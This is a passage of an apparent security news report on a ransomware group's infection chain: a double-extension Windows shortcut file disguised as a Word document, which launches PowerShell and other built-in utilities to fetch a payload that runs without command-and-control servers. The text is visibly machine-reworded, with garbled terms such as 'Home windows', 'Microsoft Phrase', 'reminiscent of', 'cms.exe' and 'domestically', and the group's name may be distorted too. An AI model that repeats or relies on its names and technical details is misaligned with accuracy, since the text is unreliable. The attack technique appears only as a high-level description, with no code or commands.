Not like many fashionable ransomware operations that depend on exterior command-and-control (C2) infrastructure, the International Group payload executes domestically as soon as delivered, complicating detection and response efforts by conventional network-centric security controls, the researchers famous.
Weaponized LNK recordsdata
The an infection chain begins with a person opening a shortcut file with a double extension, reminiscent of “Doc.doc.lnk”. As a result of Home windows hides file extensions by default, the file seems to the person as a reliable doc. The shortcut icon can also be personalized to resemble a Microsoft Phrase file to additional cut back suspicion.
When executed, the .lnk file launches built-in Home windows utilities, together with cms.exe and PowerShell, to retrieve and execute the next-stage payload. As a result of no exploit is concerned, this method permits attackers to bypass security controls that concentrate on malicious paperwork or executable attachments.
